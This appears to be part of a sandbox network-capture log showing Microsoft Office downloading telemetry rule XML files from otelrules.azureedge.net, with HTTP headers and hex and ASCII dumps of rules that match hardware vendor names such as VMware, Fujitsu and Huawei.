                                                                        2024-12-03 16:50:33 UTC464INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 47 67 5d 5b 49 69 5d 5b 47 67 5d 5b 41 61 5d 5b 42 62 5d 5b 59 79 5d 5b 54 74 5d 5b 45 65 5d 20 5b 54 74 5d 5b 45 65 5d 5b 43 63 5d 5b 48 68 5d 5b 4e 6e 5d 5b 4f 6f 5d 5b 4c 6c 5d 5b 4f 6f 5d 5b 47 67 5d 5b 59 79 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72
                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120623" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120621" /> <SR T="2" R="([Gg][Ii][Gg][Aa][Bb][Yy][Tt][Ee] [Tt][Ee][Cc][Hh][Nn][Oo][Ll][Oo][Gg][Yy])"> <S T="1" F="1" M="Ignor


                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                        38192.168.2.44979313.107.246.63443
                                                                        TimestampBytes transferredDirectionData
                                                                        2024-12-03 16:50:32 UTC192OUTGET /rules/rule120621v0s19.xml HTTP/1.1
                                                                        Connection: Keep-Alive
                                                                        Accept-Encoding: gzip
                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                        Host: otelrules.azureedge.net
                                                                        2024-12-03 16:50:33 UTC470INHTTP/1.1 200 OK
                                                                        Date: Tue, 03 Dec 2024 16:50:32 GMT
                                                                        Content-Type: text/xml
                                                                        Content-Length: 415
                                                                        Connection: close
                                                                        Cache-Control: public, max-age=604800, immutable
                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:03 GMT
                                                                        ETag: "0x8DC582BA41997E3"
                                                                        x-ms-request-id: 106d127d-401e-008c-1a91-3f86c2000000
                                                                        x-ms-version: 2018-03-28
                                                                        x-azure-ref: 20241203T165032Z-174f78459685726chC1EWRsnbg000000165g00000000rx1k
                                                                        x-fd-int-roxy-purgeid: 0
                                                                        X-Cache: TCP_HIT
                                                                        Accept-Ranges: bytes
                                                                        2024-12-03 16:50:33 UTC415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 56 76 5d 5b 4d 6d 5d 5b 57 77 5d 5b 41 61 5d 5b 52 72 5d 5b 45 65 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75
                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120621" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120619" /> <SR T="2" R="([Vv][Mm][Ww][Aa][Rr][Ee])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru


                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                        39192.168.2.44979613.107.246.63443
                                                                        TimestampBytes transferredDirectionData
                                                                        2024-12-03 16:50:33 UTC192OUTGET /rules/rule120624v0s19.xml HTTP/1.1
                                                                        Connection: Keep-Alive
                                                                        Accept-Encoding: gzip
                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                        Host: otelrules.azureedge.net
                                                                        2024-12-03 16:50:33 UTC470INHTTP/1.1 200 OK
                                                                        Date: Tue, 03 Dec 2024 16:50:33 GMT
                                                                        Content-Type: text/xml
                                                                        Content-Length: 494
                                                                        Connection: close
                                                                        Cache-Control: public, max-age=604800, immutable
                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:35 GMT
                                                                        ETag: "0x8DC582BB7010D66"
                                                                        x-ms-request-id: ef6c78e4-401e-0067-2ec7-4309c2000000
                                                                        x-ms-version: 2018-03-28
                                                                        x-azure-ref: 20241203T165033Z-174f7845968nxc96hC1EWRspw8000000160g000000005hp8
                                                                        x-fd-int-roxy-purgeid: 0
                                                                        X-Cache: TCP_HIT
                                                                        Accept-Ranges: bytes
                                                                        2024-12-03 16:50:33 UTC494INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120624" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120623" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                        40192.168.2.44979813.107.246.63443
                                                                        TimestampBytes transferredDirectionData
                                                                        2024-12-03 16:50:34 UTC192OUTGET /rules/rule120625v0s19.xml HTTP/1.1
                                                                        Connection: Keep-Alive
                                                                        Accept-Encoding: gzip
                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                        Host: otelrules.azureedge.net
                                                                        2024-12-03 16:50:35 UTC470INHTTP/1.1 200 OK
                                                                        Date: Tue, 03 Dec 2024 16:50:34 GMT
                                                                        Content-Type: text/xml
                                                                        Content-Length: 419
                                                                        Connection: close
                                                                        Cache-Control: public, max-age=604800, immutable
                                                                        Last-Modified: Tue, 09 Apr 2024 00:25:42 GMT
                                                                        ETag: "0x8DC582B9748630E"
                                                                        x-ms-request-id: 02716611-001e-00ad-7089-3f554b000000
                                                                        x-ms-version: 2018-03-28
                                                                        x-azure-ref: 20241203T165034Z-174f7845968kdththC1EWRzvxn0000000kh000000000h4md
                                                                        x-fd-int-roxy-purgeid: 0
                                                                        X-Cache: TCP_HIT
                                                                        Accept-Ranges: bytes
                                                                        2024-12-03 16:50:35 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 46 66 5d 5b 55 75 5d 5b 4a 6a 5d 5b 49 69 5d 5b 54 74 5d 5b 53 73 5d 5b 55 75 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120625" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120623" /> <SR T="2" R="([Ff][Uu][Jj][Ii][Tt][Ss][Uu])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                        41192.168.2.44979913.107.246.63443
                                                                        TimestampBytes transferredDirectionData
                                                                        2024-12-03 16:50:34 UTC192OUTGET /rules/rule120626v0s19.xml HTTP/1.1
                                                                        Connection: Keep-Alive
                                                                        Accept-Encoding: gzip
                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                        Host: otelrules.azureedge.net
                                                                        2024-12-03 16:50:35 UTC470INHTTP/1.1 200 OK
                                                                        Date: Tue, 03 Dec 2024 16:50:35 GMT
                                                                        Content-Type: text/xml
                                                                        Content-Length: 472
                                                                        Connection: close
                                                                        Cache-Control: public, max-age=604800, immutable
                                                                        Last-Modified: Tue, 09 Apr 2024 00:25:53 GMT
                                                                        ETag: "0x8DC582B9DACDF62"
                                                                        x-ms-request-id: 8889e7de-701e-003e-6ef2-4479b3000000
                                                                        x-ms-version: 2018-03-28
                                                                        x-azure-ref: 20241203T165035Z-174f7845968cs2nkhC1EWR2tq000000001x000000000b6v6
                                                                        x-fd-int-roxy-purgeid: 0
                                                                        X-Cache: TCP_HIT
                                                                        Accept-Ranges: bytes
                                                                        2024-12-03 16:50:35 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120626" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120625" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                        42192.168.2.44980113.107.246.63443
                                                                        TimestampBytes transferredDirectionData
                                                                        2024-12-03 16:50:34 UTC192OUTGET /rules/rule120628v0s19.xml HTTP/1.1
                                                                        Connection: Keep-Alive
                                                                        Accept-Encoding: gzip
                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                        Host: otelrules.azureedge.net
                                                                        2024-12-03 16:50:35 UTC470INHTTP/1.1 200 OK
                                                                        Date: Tue, 03 Dec 2024 16:50:35 GMT
                                                                        Content-Type: text/xml
                                                                        Content-Length: 468
                                                                        Connection: close
                                                                        Cache-Control: public, max-age=604800, immutable
                                                                        Last-Modified: Tue, 09 Apr 2024 00:25:51 GMT
                                                                        ETag: "0x8DC582B9C8E04C8"
                                                                        x-ms-request-id: 5181e575-b01e-001e-206f-430214000000
                                                                        x-ms-version: 2018-03-28
                                                                        x-azure-ref: 20241203T165035Z-174f7845968n2hr8hC1EWR9cag00000015wg000000008ram
                                                                        x-fd-int-roxy-purgeid: 0
                                                                        X-Cache: TCP_HIT
                                                                        Accept-Ranges: bytes
                                                                        2024-12-03 16:50:35 UTC468INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120628" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120627" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                        43192.168.2.44980013.107.246.63443
                                                                        TimestampBytes transferredDirectionData
                                                                        2024-12-03 16:50:34 UTC192OUTGET /rules/rule120627v0s19.xml HTTP/1.1
                                                                        Connection: Keep-Alive
                                                                        Accept-Encoding: gzip
                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                        Host: otelrules.azureedge.net
                                                                        2024-12-03 16:50:35 UTC470INHTTP/1.1 200 OK
                                                                        Date: Tue, 03 Dec 2024 16:50:35 GMT
                                                                        Content-Type: text/xml
                                                                        Content-Length: 404
                                                                        Connection: close
                                                                        Cache-Control: public, max-age=604800, immutable
                                                                        Last-Modified: Tue, 09 Apr 2024 00:25:54 GMT
                                                                        ETag: "0x8DC582B9E8EE0F3"
                                                                        x-ms-request-id: 3f7caad5-701e-006f-6962-43afc4000000
                                                                        x-ms-version: 2018-03-28
                                                                        x-azure-ref: 20241203T165035Z-174f7845968px8v7hC1EWR08ng00000016f000000000d9at
                                                                        x-fd-int-roxy-purgeid: 0
                                                                        X-Cache: TCP_HIT
                                                                        Accept-Ranges: bytes
                                                                        2024-12-03 16:50:35 UTC404INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 4e 6e 5d 5b 45 65 5d 5b 43 63 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c 53
                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120627" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120625" /> <SR T="2" R="^([Nn][Ee][Cc])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <S


                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                        44192.168.2.44980213.107.246.63443
                                                                        TimestampBytes transferredDirectionData
                                                                        2024-12-03 16:50:35 UTC192OUTGET /rules/rule120629v0s19.xml HTTP/1.1
                                                                        Connection: Keep-Alive
                                                                        Accept-Encoding: gzip
                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                        Host: otelrules.azureedge.net
                                                                        2024-12-03 16:50:35 UTC470INHTTP/1.1 200 OK
                                                                        Date: Tue, 03 Dec 2024 16:50:35 GMT
                                                                        Content-Type: text/xml
                                                                        Content-Length: 428
                                                                        Connection: close
                                                                        Cache-Control: public, max-age=604800, immutable
                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:17 GMT
                                                                        ETag: "0x8DC582BAC4F34CA"
                                                                        x-ms-request-id: 13f01659-601e-0084-129a-426b3f000000
                                                                        x-ms-version: 2018-03-28
                                                                        x-azure-ref: 20241203T165035Z-174f78459684bddphC1EWRbht400000015xg00000000ggts
                                                                        x-fd-int-roxy-purgeid: 0
                                                                        X-Cache: TCP_HIT
                                                                        Accept-Ranges: bytes
                                                                        2024-12-03 16:50:35 UTC428INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4d 6d 5d 5b 49 69 5d 5b 43 63 5d 5b 52 72 5d 5b 4f 6f 5d 2d 5b 53 73 5d 5b 54 74 5d 5b 41 61 5d 5b 52 72 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22
                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120629" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120627" /> <SR T="2" R="([Mm][Ii][Cc][Rr][Oo]-[Ss][Tt][Aa][Rr])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                        45192.168.2.44980313.107.246.63443
                                                                        TimestampBytes transferredDirectionData
                                                                        2024-12-03 16:50:36 UTC192OUTGET /rules/rule120630v0s19.xml HTTP/1.1
                                                                        Connection: Keep-Alive
                                                                        Accept-Encoding: gzip
                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                        Host: otelrules.azureedge.net
                                                                        2024-12-03 16:50:37 UTC470INHTTP/1.1 200 OK
                                                                        Date: Tue, 03 Dec 2024 16:50:37 GMT
                                                                        Content-Type: text/xml
                                                                        Content-Length: 499
                                                                        Connection: close
                                                                        Cache-Control: public, max-age=604800, immutable
                                                                        Last-Modified: Tue, 09 Apr 2024 00:25:45 GMT
                                                                        ETag: "0x8DC582B98CEC9F6"
                                                                        x-ms-request-id: f843b097-901e-00ac-53c3-43b69e000000
                                                                        x-ms-version: 2018-03-28
                                                                        x-azure-ref: 20241203T165037Z-174f7845968cpnpfhC1EWR3afc00000015ug00000000dk4s
                                                                        x-fd-int-roxy-purgeid: 0
                                                                        X-Cache: TCP_HIT
                                                                        Accept-Ranges: bytes
                                                                        2024-12-03 16:50:37 UTC499INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120630" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120629" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                        46192.168.2.44980413.107.246.63443
                                                                        TimestampBytes transferredDirectionData
                                                                        2024-12-03 16:50:37 UTC192OUTGET /rules/rule120631v0s19.xml HTTP/1.1
                                                                        Connection: Keep-Alive
                                                                        Accept-Encoding: gzip
                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                        Host: otelrules.azureedge.net
                                                                        2024-12-03 16:50:37 UTC470INHTTP/1.1 200 OK
                                                                        Date: Tue, 03 Dec 2024 16:50:37 GMT
                                                                        Content-Type: text/xml
                                                                        Content-Length: 415
                                                                        Connection: close
                                                                        Cache-Control: public, max-age=604800, immutable
                                                                        Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                                                                        ETag: "0x8DC582B988EBD12"
                                                                        x-ms-request-id: e9899596-601e-000d-62ee-442618000000
                                                                        x-ms-version: 2018-03-28
                                                                        x-azure-ref: 20241203T165037Z-174f7845968px8v7hC1EWR08ng00000016b000000000wazq
                                                                        x-fd-int-roxy-purgeid: 0
                                                                        X-Cache: TCP_HIT
                                                                        Accept-Ranges: bytes
                                                                        2024-12-03 16:50:37 UTC415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 48 68 5d 5b 55 75 5d 5b 41 61 5d 5b 57 77 5d 5b 45 65 5d 5b 49 69 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75
                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120631" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120629" /> <SR T="2" R="([Hh][Uu][Aa][Ww][Ee][Ii])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru


                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                        47192.168.2.44980513.107.246.63443
                                                                        TimestampBytes transferredDirectionData
                                                                        2024-12-03 16:50:37 UTC192OUTGET /rules/rule120632v0s19.xml HTTP/1.1
                                                                        Connection: Keep-Alive
                                                                        Accept-Encoding: gzip
                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                        Host: otelrules.azureedge.net
                                                                        2024-12-03 16:50:37 UTC470INHTTP/1.1 200 OK
                                                                        Date: Tue, 03 Dec 2024 16:50:37 GMT
                                                                        Content-Type: text/xml
                                                                        Content-Length: 471
                                                                        Connection: close
                                                                        Cache-Control: public, max-age=604800, immutable
                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:33 GMT
                                                                        ETag: "0x8DC582BB5815C4C"
                                                                        x-ms-request-id: 77d22349-001e-0028-7af8-44c49f000000
                                                                        x-ms-version: 2018-03-28
                                                                        x-azure-ref: 20241203T165037Z-174f7845968ljs8phC1EWRe6en000000160g00000000ktqz
                                                                        x-fd-int-roxy-purgeid: 0
                                                                        X-Cache: TCP_HIT
                                                                        Accept-Ranges: bytes
                                                                        2024-12-03 16:50:37 UTC471INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120632" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120631" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                        48192.168.2.44980613.107.246.63443
                                                                        TimestampBytes transferredDirectionData
                                                                        2024-12-03 16:50:37 UTC192OUTGET /rules/rule120633v0s19.xml HTTP/1.1
                                                                        Connection: Keep-Alive
                                                                        Accept-Encoding: gzip
                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                        Host: otelrules.azureedge.net
                                                                        2024-12-03 16:50:37 UTC470INHTTP/1.1 200 OK
                                                                        Date: Tue, 03 Dec 2024 16:50:37 GMT
                                                                        Content-Type: text/xml
                                                                        Content-Length: 419
                                                                        Connection: close
                                                                        Cache-Control: public, max-age=604800, immutable
                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:29 GMT
                                                                        ETag: "0x8DC582BB32BB5CB"
                                                                        x-ms-request-id: 2132beec-901e-00ac-46aa-42b69e000000
                                                                        x-ms-version: 2018-03-28
                                                                        x-azure-ref: 20241203T165037Z-174f78459685726chC1EWRsnbg000000168g00000000df7n
                                                                        x-fd-int-roxy-purgeid: 0
                                                                        X-Cache: TCP_HIT
                                                                        Accept-Ranges: bytes
